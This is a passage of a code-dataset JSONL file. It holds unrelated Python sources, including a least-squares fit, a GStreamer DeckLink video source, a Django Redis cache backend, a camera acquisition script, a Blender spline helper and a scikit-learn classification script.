2.72, 6.39, 8.71, 4.7, 2.66, 3.78])\n Y = np.array([7.01, 2.78, 6.47, 6.71, 4.1, 4.23, 4.05])\n # leastsq使得f的输出数组的平方和最小,参数初始值为[1,0]\n r = leastsq(f, [1, 0]) # 数初始值可以随便设个合理的\n k, b = r[0]\n x = np.linspace(0, 10, 1000)\n y = k * x + b\n\n # 画散点图,s是点的大小\n plt.scatter(X, Y, s=100, alpha=1.0, marker='o', label=u'数据点')\n # 话拟合曲线,linewidth是线宽\n plt.plot(x, y, color='r', linewidth=2, linestyle=\"-\", markersize=20, label=u'拟合曲线')\n plt.xlabel('安培/A') # 美赛就不用中文了\n plt.ylabel('伏特/V')\n plt.legend(loc=0, numpoints=1) # 显示点和线的说明\n # plt.plot(X, Y)\n plt.show()\n\n print('k = ', k)\n print('b = ', b)\n","sub_path":"PythonLearning/MathematicalModeling/数值逼近/最小二乘法.py","file_name":"最小二乘法.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"403109883","text":"import logging\nimport re\n\nfrom gi.repository import Gst\n\nfrom lib.config import Config\nfrom lib.sources.avsource import AVSource\n\n\nclass DeckLinkAVSource(AVSource):\n\n def __init__(self, name, outputs=None, has_audio=True, has_video=True):\n self.log = logging.getLogger('DecklinkAVSource[{}]'.format(name))\n super().__init__(name, outputs, has_audio, has_video)\n\n section = 'source.{}'.format(name)\n\n # Device number, default: 0\n self.device = Config.get(section, 'devicenumber', fallback=0)\n\n # Audio connection, default: Automatic\n self.aconn = Config.get(section, 'audio_connection', fallback='auto')\n\n # Video connection, default: Automatic\n self.vconn = Config.get(section, 'video_connection', fallback='auto')\n\n # Video mode, default: 1080i50\n self.vmode = Config.get(section, 'video_mode', fallback='1080i50')\n\n # Video format, default: auto\n self.vfmt = Config.get(section, 'video_format', fallback='auto')\n\n self.audiostream_map = self._parse_audiostream_map(section)\n self.log.info(\"audiostream_map: %s\", self.audiostream_map)\n\n self.fallback_default = False\n if len(self.audiostream_map) == 0:\n self.log.info(\"no audiostream-mapping defined,\"\n \"defaulting to mapping channel 0+1 to first stream\")\n self.fallback_default = True\n\n self._warn_incorrect_number_of_streams()\n\n self.required_input_channels = \\\n self._calculate_required_input_channels()\n\n self.log.info(\"configuring decklink-input to %u channels\",\n self.required_input_channels)\n\n min_gst_multi_channels = (1, 12, 3)\n if self.required_input_channels > 2 and \\\n Gst.version() < min_gst_multi_channels:\n\n self.log.warning(\n 'GStreamer version %s is probably too to use more then 2 '\n 'channels on your decklink source. officially supported '\n 'since %s',\n tuple(Gst.version()), min_gst_multi_channels)\n\n self.launch_pipeline()\n\n def _calculate_required_input_channels(self):\n required_input_channels = 0\n for audiostream, mapping in self.audiostream_map.items():\n left, right = self._parse_audiostream_mapping(mapping)\n required_input_channels = max(required_input_channels, left + 1)\n if right:\n required_input_channels = max(required_input_channels,\n right + 1)\n\n required_input_channels = \\\n self._round_decklink_channels(required_input_channels)\n\n return required_input_channels\n\n def _round_decklink_channels(self, required_input_channels):\n if required_input_channels > 16:\n raise RuntimeError(\n \"Decklink-Devices support up to 16 Channels,\"\n \"you requested {}\".format(required_input_channels))\n\n elif required_input_channels > 8:\n required_input_channels = 16\n\n elif required_input_channels > 2:\n required_input_channels = 8\n\n else:\n required_input_channels = 2\n\n return required_input_channels\n\n def _parse_audiostream_map(self, config_section):\n audiostream_map = {}\n\n if config_section not in Config:\n return audiostream_map\n\n for key in Config[config_section]:\n value = Config.get(config_section, key)\n m = re.match(r'audiostream\\[(\\d+)\\]', key)\n if m:\n audiostream = int(m.group(1))\n audiostream_map[audiostream] = value\n\n return audiostream_map\n\n def _parse_audiostream_mapping(self, mapping):\n m = re.match(r'(\\d+)\\+(\\d+)', mapping)\n if m:\n return (int(m.group(1)), int(m.group(2)),)\n else:\n return (int(mapping), None,)\n\n def _warn_incorrect_number_of_streams(self):\n num_streams = Config.getint('mix', 'audiostreams')\n for audiostream, mapping in self.audiostream_map.items():\n if audiostream >= num_streams:\n raise RuntimeError(\n \"Mapping-Configuration for Stream 0 to {} found,\"\n \"but only {} enabled\"\n .format(audiostream, num_streams))\n\n def __str__(self):\n return 'DecklinkAVSource[{name}] reading card #{device}'.format(\n name=self.name,\n device=self.device\n )\n\n def launch_pipeline(self):\n # A video source is required even when we only need audio\n pipeline = \"\"\"\n decklinkvideosrc\n device-number={device}\n connection={conn}\n video-format={fmt}\n mode={mode} !\n \"\"\".format(\n device=self.device,\n conn=self.vconn,\n mode=self.vmode,\n fmt=self.vfmt\n )\n\n if self.has_video:\n pipeline += \"\"\"\n {deinterlacer}\n videoconvert !\n videoscale !\n videorate name=vout\n \"\"\".format(\n deinterlacer=self.build_deinterlacer()\n )\n else:\n pipeline += \"\"\"\n fakesink\n \"\"\"\n\n if self.has_audio:\n pipeline += \"\"\"\n decklinkaudiosrc\n {channels}\n device-number={device}\n connection={conn}\n {output}\n \"\"\".format(\n channels=\"channels={}\".format(self.required_input_channels)\n if self.required_input_channels > 2 else\n \"\",\n device=self.device,\n conn=self.aconn,\n output=\"name=aout\"\n if self.fallback_default else\n \"! deinterleave name=aout\",\n )\n\n for audiostream, mapping in self.audiostream_map.items():\n left, right = self._parse_audiostream_mapping(mapping)\n if right is not None:\n self.log.info(\n \"mapping decklink input-channels {left} and {right}\"\n \"as left and right to output-stream {audiostream}\"\n .format(left=left,\n right=right,\n audiostream=audiostream))\n\n pipeline += \"\"\"\n interleave name=i{audiostream}\n\n aout.src_{left} ! queue ! i{audiostream}.sink_0\n aout.src_{right} ! queue ! i{audiostream}.sink_1\n \"\"\".format(\n left=left,\n right=right,\n audiostream=audiostream\n )\n else:\n self.log.info(\n \"mapping decklink input-channel {channel} \"\n \"as left and right to output-stream {audiostream}\"\n .format(channel=left,\n audiostream=audiostream))\n\n pipeline += \"\"\"\n interleave name=i{audiostream}\n aout.src_{channel} ! tee name=t{audiostream}\n\n t{audiostream}. ! queue ! i{audiostream}.sink_0\n t{audiostream}. ! queue ! i{audiostream}.sink_1\n \"\"\".format(\n channel=left,\n audiostream=audiostream\n )\n\n self.build_pipeline(pipeline)\n self.pipeline.set_state(Gst.State.PLAYING)\n\n def build_deinterlacer(self):\n deinterlacer = super().build_deinterlacer()\n if deinterlacer != '':\n deinterlacer += ' !'\n\n return deinterlacer\n\n def build_audioport(self, audiostream):\n if self.fallback_default and audiostream == 0:\n return \"aout.\"\n\n if audiostream in self.audiostream_map:\n return 'i{}.'.format(audiostream)\n\n def build_videoport(self):\n return 'vout.'\n\n def restart(self):\n self.pipeline.set_state(Gst.State.NULL)\n self.launch_pipeline()\n","sub_path":"voctocore/lib/sources/decklinkavsource.py","file_name":"decklinkavsource.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"286023751","text":"#!/usr/bin/env python\n\nclass Solution:\n # @param {integer} A\n # @param {integer} B\n # @param {integer} C\n # @param {integer} D\n # @param {integer} E\n # @param {integer} F\n # @param {integer} G\n # @param {integer} H\n # @return {integer}\n def computeArea(self, A, B, C, D, E, F, G, H):\n def cal_cover(x0,y0,x1,y1):\n total = y0 - x0 + y1 -x1\n if x1 >= x0:\n total = total - x1 + x0\n else:\n total = total - x0 + x1\n if y1 >= y0:\n total = total - y1 + y0\n else:\n total = total - y0 + y1\n if total > 0:\n total /= 2\n else:\n # these two rectangles do not overlap\n total = 0\n return total\n w = cal_cover(A, C, E, G)\n h = cal_cover(F, H, B, D)\n all = (C-A) * (D-B) + (G-E) * (H-F)\n return all - w * h\n\ndef test():\n s = Solution()\n assert 45 == s.computeArea(-3, 0, 3, 4, 0, -1, 9, 2)\n assert 17 == s.computeArea(-2, -2, 2, 2, 3, 3, 4, 4)\n assert 4 == s.computeArea(0, 0, 0, 0, -1, -1, 1, 1)\n print('Test Passed!')\n\nif __name__ == '__main__':\n test()\n","sub_path":"solutions/rectangle_area.py","file_name":"rectangle_area.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"200989464","text":"import dlib\nimport face_recognition \nimport os\nimport cv2\n\n\nknownFacesDir = 'known_faces'\n#unknownFacesDir = 'unknown_faces'\ntolerance = 0.5\nframeThickness = 3\nfontThinkness = 2\nmodel = 'hog'#hog\n\nvideo = cv2.VideoCapture(0)\n\n\nprint(\"Loading Known Faces\")\n\nknownFaces = []\nknownNames = []\n\nfor name in os.listdir(knownFacesDir):\n\tfor fileName in os.listdir(f\"{knownFacesDir}/{name}\"):\n\t\timage = face_recognition.load_image_file(f\"{knownFacesDir}/{name}/{fileName}\")\n\t\tencoding = face_recognition.face_encodings(image)[0]\n\t\tknownFaces.append(encoding)\n\t\tknownNames.append(name)\n\nprint(\"Processing Unknown faces...\")\n\nwhile True:\n\t#print(filename)\n\t#image = face_recognition.load_image_file(f\"{unknownFacesDir}/{filename}\")\n\tret, image = video.read()\n\n\tloactions = face_recognition.face_locations(image, model = model)\n\tencodings = face_recognition.face_encodings(image, loactions)\n\t#image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n\tfor face_encodings, face_locations in zip(encodings, loactions):\n\t\tresults = face_recognition.compare_faces(knownFaces, face_encodings, tolerance)\n\t\tmatch = None\n\t\tif True in results:\n\t\t\tmatch = knownNames[results.index(True)]\n\t\t\tprint(f\"Match Found: {match}\")\n\t\t\ttop_left = (face_locations[3], face_locations[0])\n\t\t\tbtm_left = (face_locations[1], face_locations[2])\n\t\t\tcolor = [255, 0 , 0]\n\t\t\tcv2.rectangle(image, top_left, btm_left, color, frameThickness)\n\n\t\t\ttop_left = (face_locations[3], face_locations[2])\n\t\t\tbtm_left = (face_locations[1], face_locations[2]+22)\n\t\t\tcv2.rectangle(image, top_left, btm_left, color, cv2.FILLED)\n\t\t\tcv2.putText(image, match, (face_locations[3]+10, face_locations[2]+15),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), fontThinkness)\n\tcv2.imshow(fileName, image)\n\tif cv2.waitKey(1) & 0xff == ord('q'):\n\t\tbreak\n\n\t#cv2.waitKey(0)\n\t#cv2.destroyWindow(fileName)\n\n\n\n","sub_path":"recFaceVideo.py","file_name":"recFaceVideo.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"329864087","text":"from Square import Square\nfrom Numemy import Numemy\nimport math\n\n\ndef tower_cost(value, operation):\n if operation in ['+', '-']:\n factor = 1\n elif operation == '*':\n factor = 1.5\n else:\n factor = 2\n cost = max((factor * value) // 2, 1)\n return cost\n\nclass Tower(Square):\n # 'range' is the radius of the circle the Tower attacks within;\n # 'speed' is how often it attacks;\n # 'cost' is removed from player's wealth;\n # 'level' is 1, 2 or 3 and increases range and speed.\n def __init__(self, surface, value, operation, location):\n Square.__init__(self, surface)\n self.range = 3\n self.speed = 1\n self.value = value\n self.operation = operation\n self.location = location\n self.level = 1\n self.cost = tower_cost(value, operation)\n self.upgrade_cost = max(self.level * self.cost // 3, 1)\n\n def calculate_dist(self, numemyPos, towerPos):\n dist = math.sqrt((towerPos[0] - numemyPos[0])**2 + (towerPos[1] - numemyPos[1])**2)\n return abs(dist)\n\n def attack(self, grid, numemy):\n \"\"\"Damages a Numemy, and kills it if health is 0\"\"\"\n numemy.take_damage(self.operation, self.value)\n if numemy.value == 0:\n grid.square_grid[numemy.location[0]][numemy.location[1]].remove(numemy)\n grid.souls += numemy.souls\n\n def find_targets(self, grid):\n \"\"\"Returns a Numemy within range, if one exists\"\"\"\n for num_loc in grid.num_loc_list:\n square = grid.square_grid[num_loc[0]][num_loc[1]]\n for entity in square:\n if isinstance(entity, Numemy):\n dist = self.calculate_dist(entity.location, self.location)\n if dist <= self.range:\n return entity\n return None\n\n def upgrade(self, grid):\n \"\"\"Increases the level of a Tower as well as associated attributes\"\"\"\n grid.souls -= self.upgrade_cost\n self.level += 1\n self.range *= 1.5\n self.speed *= 1.5\n self.upgrade_cost = max(self.level * self.cost // 3, 1)\n","sub_path":"src/Tower.py","file_name":"Tower.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"92571352","text":"import warnings\nfrom django.core.cache.backends.base import BaseCache, InvalidCacheBackendError\nfrom django.utils.encoding import smart_unicode, smart_str\nfrom django.utils.datastructures import SortedDict\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\ntry:\n import redis\nexcept ImportError:\n raise InvalidCacheBackendError(\n \"Redis cache backend requires the 'redis-py' library\")\n\n\nclass CacheClass(BaseCache):\n def __init__(self, server, params):\n \"\"\"\n Connect to Redis, and sets up cache backend.\n \n Additional params:\n \n key: ``db``\n type: ``int``\n default: ``1``\n description: ``Specifies redis db number to use``\n \n key: ``fail_silently``\n type: ``int``\n default: ``0``\n description: ``When non-zero integer, swallows exceptions, emitting them as warnings instead. Allows cache\n server to go down without killing the site``\n \n \"\"\"\n BaseCache.__init__(self, params)\n \n db = params.get('db', 1)\n try:\n db = int(db)\n except (ValueError, TypeError):\n db = 1\n \n fail_silently = params.get('fail_silently', 0)\n try:\n self.fail_silently = bool(int(fail_silently))\n except (ValueError, TypeError):\n self.fail_silently = False\n \n password = params.get('password', None)\n if ':' in server:\n host, port = server.split(':')\n try:\n port = int(port)\n except (ValueError, TypeError):\n port = 6379\n else:\n host = 'localhost'\n port = 6379\n\n try:\n self._cache = redis.Redis(host=host, port=port, db=db, password=password)\n except Exception as err:\n self.warn_or_error(err)\n \n def warn_or_error(self, exception, default_return_value=None):\n \"\"\"\n Emits a warning and returns a default value, or re-raises an Exception depending on cache configuration options.\n \"\"\"\n if not self.fail_silently:\n raise exception\n\n warnings.warn(str(exception), RuntimeWarning)\n return default_return_value\n \n\n def prepare_key(self, key):\n \"\"\"\n Returns the utf-8 encoded bytestring of the given key.\n \"\"\"\n return smart_str(key)\n\n def add(self, key, value, timeout=None):\n \"\"\"\n Add a value to the cache, failing if the key already exists.\n\n Returns ``True`` if the object was added, ``False`` if not.\n \"\"\"\n try:\n key = self.prepare_key(key)\n if self._cache.exists(key):\n return False\n return self.set(key, value, timeout)\n except Exception as err:\n return self.warn_or_error(err, False)\n\n def get(self, key, default=None):\n \"\"\"\n Retrieve a value from the cache.\n\n Returns unpicked value if key is found, ``None`` if not.\n \"\"\"\n try:\n # get the value from the cache\n value = self._cache.get(self.prepare_key(key))\n if value is None:\n return default\n # pickle doesn't want a unicode!\n value = smart_str(value)\n # hydrate that pickle\n return pickle.loads(value)\n except Exception as err:\n return self.warn_or_error(err)\n\n def set(self, key, value, timeout=None):\n \"\"\"\n Persist a value to the cache, and set an optional expiration time.\n \"\"\"\n try:\n key = self.prepare_key(key)\n # store the pickled value\n result = self._cache.set(key, pickle.dumps(value))\n # set expiration if needed\n self.expire(key, timeout)\n # result is a boolean\n return result\n except Exception as err:\n return self.warn_or_error(err, False)\n\n def expire(self, key, timeout=None):\n \"\"\"\n Set content expiration, if necessary\n \"\"\"\n try:\n if timeout == 0:\n # force the key to be non-volatile\n result = self._cache.get(key)\n self._cache.set(key, result)\n else:\n timeout = timeout or self.default_timeout\n # If the expiration command returns false, we need to reset the key\n # with the new expiration\n if not self._cache.expire(key, timeout):\n value = self.get(key)\n self.set(key, value, timeout)\n except Exception as err:\n return self.warn_or_error(err)\n\n def delete(self, key):\n \"\"\"\n Remove a key from the cache.\n \"\"\"\n try:\n self._cache.delete(self.prepare_key(key))\n except Exception as err:\n return self.warn_or_error(err)\n\n def delete_many(self, keys):\n \"\"\"\n Remove multiple keys at once.\n \"\"\"\n try:\n if keys:\n self._cache.delete(*map(self.prepare_key, keys))\n except Exception as err:\n return self.warn_or_error(err)\n\n def clear(self):\n \"\"\"\n Flush all cache keys.\n \"\"\"\n try:\n self._cache.flushdb()\n except Exception as err:\n return self.warn_or_error(err)\n\n def get_many(self, keys):\n \"\"\"\n Retrieve many keys.\n \"\"\"\n try:\n recovered_data = SortedDict()\n results = self._cache.mget(map(lambda k: self.prepare_key(k), keys))\n for key, value in zip(keys, results):\n if value is None:\n continue\n # pickle doesn't want a unicode!\n value = smart_str(value)\n # hydrate that pickle\n value = pickle.loads(value)\n if isinstance(value, basestring):\n value = smart_unicode(value)\n recovered_data[key] = value\n return recovered_data\n except Exception as err:\n return self.warn_or_error(err, recovered_data)\n\n def set_many(self, data, timeout=None):\n \"\"\"\n Set a bunch of values in the cache at once from a dict of key/value\n pairs. This is much more efficient than calling set() multiple times.\n\n If timeout is given, that timeout will be used for the key; otherwise\n the default cache timeout will be used.\n \"\"\"\n try:\n safe_data = {}\n for key, value in data.iteritems():\n safe_data[self.prepare_key(key)] = pickle.dumps(value)\n if safe_data:\n self._cache.mset(safe_data)\n map(self.expire, safe_data, [timeout]*len(safe_data))\n except Exception as err:\n return self.warn_or_error(err)\n\n def incr(self, key, delta=1):\n \"\"\"\n Does not use the atomic redis incr or incrby as there seems to be a problem with retrieving the correct value back from the server. Uses\n the regular Django get then set.\n \"\"\"\n try:\n key = self.prepare_key(key)\n return super(CacheClass, self).incr(key, delta)\n except Exception as err:\n return self.warn_or_error(err, delta)\n\n def decr(self, key, delta=1):\n \"\"\"\n Does not use the atomic redis decr or decrby as there seems to be a problem with retrieving the correct value back from the server. Uses\n the regular Django get then set.\n \"\"\"\n try:\n key = self.prepare_key(key)\n return super(CacheClass, self).decr(key, delta)\n except Exception as err:\n return self.warn_or_error(err, delta)\n \n def close(self, **kwargs):\n \"\"\"\n Disconnect from the cache.\n \"\"\"\n try:\n self._cache.connection.disconnect()\n except Exception as err:\n return self.warn_or_error(err)\n","sub_path":"redis_cache/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"576599924","text":"from pathlib import Path\nimport time\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport png\n\nfrom pymba import *\nfrom pymba.vimbaexception import VimbaException\nfrom pymba.vimbainterface import VimbaInterface\nfrom pymanip import Session\n\n# Paramètres de l'acquisition\ndestination_dir = Path(r'C:\\Users\\Julien Salort\\Documents\\Acquis')\nacquisition_name = 'essai'\nimages_dir = destination_dir / acquisition_name\nN = 20\n\nif not destination_dir.exists():\n destination_dir.mkdir()\nif not destination_dir.is_dir():\n raise NotADirectoryError\nif not images_dir.exists():\n images_dir.mkdir()\nif not images_dir.is_dir():\n raise NotADirectoryError\n\nMI = Session(images_dir, ('timestamp',))\n\ndef print_features(cam):\n cameraFeatureNames = cam.getFeatureNames()\n for name in cameraFeatureNames:\n try:\n val = cam.__getattr__(name)\n if isinstance(val, bytes):\n val = val.decode('ascii')\n info = cam.getFeatureInfo(name)\n unit = info.unit\n if isinstance(unit, bytes):\n unit = unit.decode('ascii')\n elif unit is None:\n unit = \"\"\n print(info.displayName.decode('ascii'),\n '(' + name.decode('ascii') + ')',\n ':', val, unit)\n except VimbaException:\n print(name.decode('ascii'), ': ?')\n \nwith Vimba() as vimba:\n print(\"Vimba version:\", vimba.getVersion())\n system = vimba.getSystem()\n print(\"\"\"\nVimba System features\n=====================\"\"\")\n print_features(system)\n \n # list available cameras (after enabling discovery for GigE cameras)\n if system.GeVTLIsPresent:\n system.runFeatureCommand(\"GeVDiscoveryAllOnce\")\n time.sleep(0.2)\n \n # Ouverture de le caméra\n cameraIds = vimba.getCameraIds()\n \n for cameraId in cameraIds:\n #print('Camera ID:', cameraId)\n cam = vimba.getCamera(cameraId)\n cam.openCamera()\n #print('Camera ID String', cam.cameraIdString)\n \n \n # Acquisition\n\n print(\"\"\"\nCamera info structure\n=====================\"\"\")\n info = cam.getInfo()\n print('cameraName:', info.cameraName.decode('ascii'))\n print('interfaceIdString:', info.interfaceIdString.decode('ascii'))\n print('modelName:', info.modelName.decode('ascii'))\n print('serialString:', info.serialString.decode('ascii'))\n \n #print('Acquisition mode:', cam.AcquisitionMode)\n # Possible values: 'Continuous', 'SingleFrame', 'MultiFrame', 'Recorder'\n #cam.IIDCActivateFormat7 = True\n cam.AcquisitionMode = 'Continuous'\n cam.IIDCPhyspeed = 'S800'\n cam.PixelFormat = 'Mono16'\n \n #cam.AcquisitionFrameRate = 20.0\n cam.TriggerMode = 'On'\n \n #cam.IIDCPacketSizeAuto = 'On'\n \n print(\"\"\"\nVimba Camera features\n=====================\"\"\")\n print_features(cam)\n \n frame = cam.getFrame()\n frame.announceFrame()\n\n print(\"\"\"\nAcquisition\n===========\"\"\")\n cam.startCapture()\n cam.runFeatureCommand('AcquisitionStart')\n\n for i in range(N):\n frame.queueFrameCapture()\n frame.waitFrameCapture()\n timestamp = frame.timestamp/1e7\n img = png.from_array(frame.getImage(), mode='L')\n with open(images_dir / 'img-{:03d}.png'.format(i), 'wb') as f:\n img.save(f)\n MI.log_addline()\n \n cam.runFeatureCommand('AcquisitionStop')\n cam.endCapture()\n cam.revokeAllFrames()\n\nprint('Finished.')\n\n# Graphe des timestamps\nt = MI['timestamp'][-N:]\ntMI = MI['t'][-N:]\nMI.Stop()\nreal_fs = 1/np.mean(t[1:]-t[:-1])\nprint('Real fs =', real_fs, 'Hz')\nprint('Computer estimated=', 1/np.mean(tMI[1:]-tMI[:-1]))\n\nplt.figure()\nplt.plot(t-t[0], 'bo')\nplt.show()\nMI.Stop()\n","sub_path":"samples/pymba_acquisition_continuous.py","file_name":"pymba_acquisition_continuous.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"388131197","text":"\"\"\"New user model\n\nRevision ID: ca77a3430b2\nRevises: 69423a89666\nCreate Date: 2014-10-24 15:46:16.070648\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'ca77a3430b2'\ndown_revision = '69423a89666'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(), nullable=True),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('picture', sa.String(), nullable=True),\n sa.Column('locale', sa.String(), nullable=True),\n sa.Column('hd', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('ownership_permissions',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('board_id', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n op.create_table('write_permissions',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('board_id', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n op.create_table('read_permissions',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('board_id', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['board_id'], ['board.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n op.add_column(u'board', sa.Column('public_can_read', sa.Boolean(), nullable=True))\n op.add_column(u'board', sa.Column('public_can_write', sa.Boolean(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(u'board', 'public_can_write')\n op.drop_column(u'board', 'public_can_read')\n op.drop_table('read_permissions')\n op.drop_table('write_permissions')\n op.drop_table('ownership_permissions')\n op.drop_table('user')\n ### end Alembic commands ###\n","sub_path":"jia/jia/migrations/versions/ca77a3430b2_.py","file_name":"ca77a3430b2_.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"591112339","text":"from mathutils import Vector\n\ndef setSplinesOnBlenderObject(object, splines):\n if object is None: return\n if object.type != \"CURVE\": return\n \n bSplines = object.data.splines\n bSplines.clear()\n for spline in splines:\n if spline.type == \"BEZIER\":\n appendBezierSpline(bSplines, spline)\n if spline.type == \"POLY\":\n appendPolySpline(bSplines, spline)\n \n \ndef appendBezierSpline(bSplines, spline):\n bSpline = bSplines.new(\"BEZIER\")\n bSpline.use_cyclic_u = spline.isCyclic\n \n # one point is already there\n bSpline.bezier_points.add(len(spline.points) - 1)\n \n for i, point in enumerate(spline.points):\n bPoint = bSpline.bezier_points[i]\n bPoint.co = point.location\n bPoint.handle_left = point.leftHandle\n bPoint.handle_right = point.rightHandle\n \n \ndef appendPolySpline(bSplines, spline):\n bSpline = bSplines.new(\"POLY\")\n bSpline.use_cyclic_u = spline.isCyclic\n \n # one point is already there\n bSpline.points.add(len(spline.points) - 1)\n \n for i, point in enumerate(spline.points):\n bSpline.points[i].co = Vector((list(point) + [0]))","sub_path":"data_structures/splines/to_blender.py","file_name":"to_blender.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"283113833","text":"from matplotlib import pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\n\r\n\r\n\"\"\"\r\n 图形需求: 3月份~10月份 气温的分布散点图\r\n\"\"\"\r\n\r\n# data\r\ny_3 = [11,17,16,11,12,11,12,6,6,7,8,9,12,15,14,17,18,21,16,17,20,14,15,15,15,19,21,22,22,22,23]\r\ny_10 = [26,26,28,19,21,17,16,19,18,20, 20,19,22,23,17,20,21,20,22,15,11,15,5,13,17,10,11,13,12,13,6]\r\n\r\nx_3 = range(1, 32)\r\nx_10 = range(41, 72)\r\n_yticks = range(0, 35)\r\n\r\n# 图形设置\r\nplt.figure(figsize=(15, 6), dpi=80)\r\nmyfont = FontProperties(fname=r\"C:\\WINDOWS\\FONTS\\MSYH.TTC\")\r\n\r\n# xy轴刻度\r\nx = list(x_3)+list(x_10)\r\n_xticks = [\"3月{}日\".format(x) for x in x_3]\r\n_xticks += [\"10月{}日\".format(x-40) for x in x_10]\r\nplt.xticks(x[::3], _xticks[::3], fontproperties=myfont, rotation=45)\r\nplt.yticks(_yticks[::2])\r\n\r\n# 网格\r\nplt.grid(alpha=0.4)\r\n\r\n# 标题\r\nplt.title(\"3月份~10月份 气温的分布散点图\", fontproperties=myfont)\r\nplt.xlabel(\"月份\", fontproperties=myfont)\r\nplt.ylabel(\"温度(℃)\", fontproperties=myfont)\r\n\r\n\r\n# plot 散点图\r\nplt.scatter(x_3, y_3, label=\"3月份\")\r\nplt.scatter(x_10, y_10, label=\"10月份\")\r\n\r\n# 图例\r\nplt.legend(prop=myfont)\r\n\r\nplt.show()\r\n\r\n","sub_path":"Analyse/demo/03_demo/scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"34189578","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier, KNeighborsRegressor, RadiusNeighborsRegressor\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.datasets import load_iris\n\n\ndata = pd.read_csv('kickstarter_filtered.tsv', sep='\\t', nrows=100)\ndata = data[['main_category', 'category', 'country', 'duration',\n 'currency', 'goal_in_usd', 'pledged_in_usd',\n 'percentage_of_money_collected', 'backers', 'state']]\n\ndata['main_category']=data['main_category'].factorize()[0]\ndata['category']=data['category'].factorize()[0]\ndata['country']=data['country'].factorize()[0]\ndata['currency']=data['currency'].factorize()[0]\ndata['state']=data['state'].factorize()[0]\n\ndef best_params(model, params, cv, x_train, y_train):\n grid = GridSearchCV(model, params, cv=cv)\n grid.fit(x_train, y_train)\n best_options = grid.best_params_\n return best_options\n\n\ndef prediction(model, x_train, y_train, x_test, y_test, cv):\n model.fit(x_train, y_train)\n score_val = np.mean(cross_val_score(model, x_train, y_train, cv=cv))\n y_pred = model.predict(x_test)\n score_acc = accuracy_score(y_test, y_pred)\n score = model.score(x_train, y_train)\n return score_val, score_acc, score\n\ndef prediction_reg(model, x_train, y_train, x_test, y_test, cv):\n model.fit(x_train, y_train)\n score_val = np.mean(cross_val_score(model, x_train, y_train, cv=cv))\n y_pred = model.predict(x_test)\n score_acc = None\n score = model.score(x_train, y_train)\n return score_val, score_acc, score\n\n\ndef normalize_data(x_train, x_test):\n scaler = MinMaxScaler()\n scaler.fit(x_train)\n x_train_norm = scaler.transform(x_train)\n x_test_norm = scaler.transform(x_test)\n return x_train_norm, x_test_norm\n\n\n# iris = load_iris()\n# x = iris['data']\n# y = iris['target']\n\nx = data.drop(columns=['state'], axis=1)\ny = data['state']\n\n# podział próbek\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\nx_train_norm, x_test_norm = normalize_data(x_train, x_test)\n\n\n\n# DecisionTreeClassifier\ndtc = DecisionTreeClassifier()\ndtc_params = {\"criterion\": [\"gini\", \"entropy\"],\n \"splitter\": [\"best\", \"random\"]}\ndtc_best_params = best_params(dtc, dtc_params, 3, x_train, y_train)\ndtc_best = DecisionTreeClassifier(**dtc_best_params)\ndtc_result = prediction(dtc_best, x_train, y_train, x_test, y_test, cv=3)\n\n# 